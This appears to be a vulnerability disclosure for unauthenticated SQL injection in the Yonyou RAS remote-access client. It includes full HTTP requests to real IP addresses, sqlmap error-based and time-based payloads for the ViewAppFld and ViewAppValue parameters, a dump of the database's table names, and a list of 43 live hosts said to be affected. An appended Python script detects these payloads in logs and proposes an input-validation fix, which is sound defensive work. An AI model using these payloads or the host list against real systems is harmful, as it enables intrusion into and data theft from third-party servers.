### Summary: With 40-odd cases attached.

### Details:

The Yonyou (用友软件) RAS Standard Edition client (远程快速应用接入, remote rapid application access) has SQL injection that is reachable without logging in.

First location:

```
POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Referer: http://116.236.131.194:8080/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 116.236.131.194:8080
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: --user-agent "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0"
Accept: */*

AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8&ViewAppValue=1
```

Both the ViewAppFld and ViewAppValue parameters are injectable.

Second location:

```
POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Referer: http://218.31.33.44:8888/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 218.31.33.44:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1&ViewAppValue=1
```

Both the ViewAppFld and ViewAppValue parameters are injectable.

### Proof:

[![aaaaaaaaaa11111111111111111.jpg](https://images.seebug.org/upload/201506/03161703dcfa29d11a9dbc51737fb59d17755658.jpg)](https://images.seebug.org/upload/201506/03161703dcfa29d11a9dbc51737fb59d17755658.jpg)

[![aaaaaaaaaaa22222222222222.jpg](https://images.seebug.org/upload/201506/0316175031a50184d8021b089629f59d6e1dc46a.jpg)](https://images.seebug.org/upload/201506/0316175031a50184d8021b089629f59d6e1dc46a.jpg)

[![aaaaaaaaaa33333333333333.jpg](https://images.seebug.org/upload/201506/031618015a5a23627fdb5a89d70b3e8be70e08c9.jpg)](https://images.seebug.org/upload/201506/031618015a5a23627fdb5a89d70b3e8be70e08c9.jpg)

[![aaaaaaa4444444444444.jpg](https://images.seebug.org/upload/201506/031618100f842c91f5a725385c8e25aa57022bf7.jpg)](https://images.seebug.org/upload/201506/031618100f842c91f5a725385c8e25aa57022bf7.jpg)

[![aaaaaaaaaa55555555555555.jpg](https://images.seebug.org/upload/201506/031618187384615d7ce44f9db731bdbd2822e01f.jpg)](https://images.seebug.org/upload/201506/031618187384615d7ce44f9db731bdbd2822e01f.jpg)

sqlmap output:

```
---
Parameter: ViewAppFld (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1
---
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
current database: 'rasdatabase'

Database: rasdatabase
[72 tables]
+---------------------------+
| hbadminrolegroupmembers   |
| hbadminrolerestrictedorgs |
| hbadminroletask           |
| hbadminroleusermembers    |
| hbclientgroupapplication  |
| hbclientgroupprinter      |
| hbdirectoryapplication    |
| hborgapplication          |
| hborglicensepolicy        |
| hborgpolicy               |
| hbpolicyvalues            |
| hbroletask                |
| hbserverapplication       |
| hbserverprinterdriver     |
| hbserverprintinf          |
| hbserverrole              |
| hbservertask              |
| hbtaskaction              |
| hbtaskcondition           |
| hbuserapplication         |
| hbuserdirectory           |
| hbuserorgs                |
| hbuserpolicy              |
| lograsarchi               |
| lograsconcurrenta         |
| lograsconcurrentus        |
| lograsent                 |
| lograssessi               |
| lograstaskactionhist      |
| lograstaskhist            |
| oemuserinfo               |
| rasactions                |
| rasadminroles             |
| rasadmintasks             |
| rasapplication            |
| rasbadprinterdriver       |
| rascfg                    |
| rasclient                 |
| rasclientgroup            |
| rascompatibilitydriver    |
| rasconcurrentsession      |
| rasconditions             |
| rasconnectionsetting      |
| rasdatabase               |
| rasdirectory              |
| rasdmzserverd             |
| rasdomain                 |
| rasgroupuser              |
| rasinfocollectordata      |
| rasjobs                   |
| rasjobsteps               |
| raslicenseinfo            |
| raslicensetoken           |
| raslicpolicy              |
| raslockdownpolicies       |
| rasmonthlyminute          |
| rasorgs                   |
| rasprinter                |
| rasprinterdriver          |
| rasproductk               |
| rasreqids                 |
| rasroles                  |
| rasrunningservers         |
| rasselection              |
| rasserver                 |
| rasstyle                  |
| rastasks                  |
| rasticketing              |
| rastimedsessio            |
| rasuser                   |
| rasusermng                |
| usermachines              |
+---------------------------+
```

Affected hosts (the 40-odd cases):

```
http://116.236.131.194:8080/
http://221.239.106.90:81/
http://61.161.199.197/
http://180.168.5.162:8080/
http://111.30.26.38:8000/
http://115.231.212.82:8080/
http://58.246.235.50/
http://218.31.33.158:8001/
http://60.10.34.57:8888/
http://218.207.195.169:8888/
http://122.224.243.218:8888/
http://124.172.246.131:81/
http://120.35.19.21:81/
http://222.69.38.12:8080/
http://61.161.182.38:8080/
http://125.93.255.209:8000/
http://223.197.196.73:81/
http://58.221.244.10:8080/
http://112.84.176.254:8000/
http://61.164.84.70:8080/
http://116.228.5.26:8080/
http://218.76.48.74:81/
http://140.207.74.170:81/
http://121.29.222.68:8080/
http://59.53.170.89:81/
http://218.31.33.44:8888/
http://60.190.102.141:8080/
http://60.12.220.103:8000/
http://122.227.192.250:8080/
http://59.37.7.110:8001/
http://222.223.228.247:81/
http://222.69.91.134:81/
http://116.228.113.155/
http://121.33.210.52:8080/
http://116.90.82.78:8000/
http://221.129.245.61:8080/
http://120.71.225.49:8000/
http://110.87.98.18:81/
http://60.29.103.158:8000/
http://120.193.185.187:81/
http://58.20.34.149:8080/
http://222.223.228.249:81/
http://210.22.101.234:8080/
```
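As an added example (not part of the original report or of the vendor's code), the Python script below shows the defender-side view of the two findings above: it walks constructed request log lines, flags values of ViewAppFld and ViewAppValue on the two endpoints named in the report that are not plain integers or that carry the fragments seen in the sqlmap payloads, and models the input check the application should apply before those values reach any query. The log line format, the SQLI_MARKERS list and all function names are this example's own assumptions; legitimate values are assumed to be small integer ids because that is what the captured requests carry.

```python
"""Added example, not part of the original report: detection of the ViewAppFld /
ViewAppValue injection pattern in request logs, plus the input check the server
should have applied. Log format, sample lines and signature list are constructed."""
from __future__ import annotations

import re
from urllib.parse import parse_qs, urlparse

# Endpoints and parameters named in the report.
VULNERABLE_PATHS = {"/server/cmxpagedquery.php", "/server/cmxfolder.php"}
SUSPECT_PARAMS = ("ViewAppFld", "ViewAppValue")

# Fragments seen in the sqlmap payloads quoted above (error-based, time-based),
# plus a couple of generic ones. Assumed signature list, not from the report.
SQLI_MARKERS = re.compile(
    r"\bSLEEP\s*\(|\bBENCHMARK\s*\(|INFORMATION_SCHEMA|\bCONCAT\s*\(|"
    r"\bFLOOR\s*\(\s*RAND|\bSELECT\b|\bUNION\b|\)\s*AND\s*\(",
    re.IGNORECASE,
)


def is_clean_value(value: str) -> bool:
    """Legitimate values of both parameters are short decimal ids (e.g. 8 and 1)."""
    return re.fullmatch(r"\d{1,9}", value) is not None


def validate_body(body: str) -> tuple[int, int]:
    """Model of the server-side fix (the report shows no code, so this is assumed):
    reject anything but integers before the values reach the query builder."""
    params = parse_qs(body, keep_blank_values=True)
    fld = params.get("ViewAppFld", [""])[0]
    val = params.get("ViewAppValue", [""])[0]
    if not (is_clean_value(fld) and is_clean_value(val)):
        raise ValueError("ViewAppFld and ViewAppValue must be integers")
    return int(fld), int(val)


def inspect_request(method: str, url: str, body: str) -> list[str]:
    """Findings for one request; an empty list means nothing suspicious."""
    path = urlparse(url).path
    if method != "POST" or path not in VULNERABLE_PATHS:
        return []
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for name in SUSPECT_PARAMS:
        for value in params.get(name, []):
            if is_clean_value(value):
                continue
            m = SQLI_MARKERS.search(value)
            reason = f"matches {m.group(0)!r}" if m else "non-numeric"
            findings.append(f"{path} {name}={value[:40]!r}: {reason}")
    return findings


def scan_log(lines: list[str]) -> list[str]:
    """Each line is '<method>\\t<url>\\t<body>' (constructed format for this example)."""
    findings: list[str] = []
    for line in lines:
        method, url, body = line.rstrip("\n").split("\t", 2)
        findings.extend(inspect_request(method, url, body))
    return findings


# Constructed sample: one normal search, the time-based payload from the report
# (URL-encoded as a browser would send it), a quote probe on the second endpoint, a GET.
SAMPLE_LOG = [
    "POST\t/server/cmxpagedquery.php?pgid=AppList&SearchFlag=true\t"
    "AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2"
    "&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8&ViewAppValue=1",
    "POST\t/server/cmxpagedquery.php?pgid=AppList&SearchFlag=true\t"
    "sort=DisplayName&sortType=A&ViewAppFld=8)+AND+(SELECT+*+FROM+"
    "(SELECT(SLEEP(30)))porO)+AND+(5447%3d5447&ViewAppValue=1",
    "POST\t/server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155\t"
    "sort=DisplayName&sortType=A&ViewAppFld=1&ViewAppValue=1'",
    "GET\t/server/cmxfolder.php?pgid=AppList\t",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("ALERT", finding)
```

Run as a script it prints one alert for the time-based payload and one for the quote probe; the normal search and the GET produce nothing. The integer check in `validate_body` is the cheap part of a fix; the durable one is to stop concatenating these parameters into SQL at all and bind them as parameters of a prepared statement, with a fixed map from field id to column name where the value selects a column.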